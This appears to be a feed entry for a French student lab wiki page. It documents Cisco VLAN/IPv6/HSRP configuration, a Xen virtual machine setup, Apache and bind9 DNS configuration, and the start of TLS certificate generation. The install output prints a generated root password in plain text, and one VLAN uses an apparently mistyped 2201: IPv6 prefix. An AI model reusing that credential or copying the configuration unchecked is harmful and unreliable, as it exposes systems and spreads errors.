   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51443</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51443"/>
				<updated>2019-11-29T14:12:08Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 - CW&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires la gestion d'authentification Wifi WPA-EAK ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
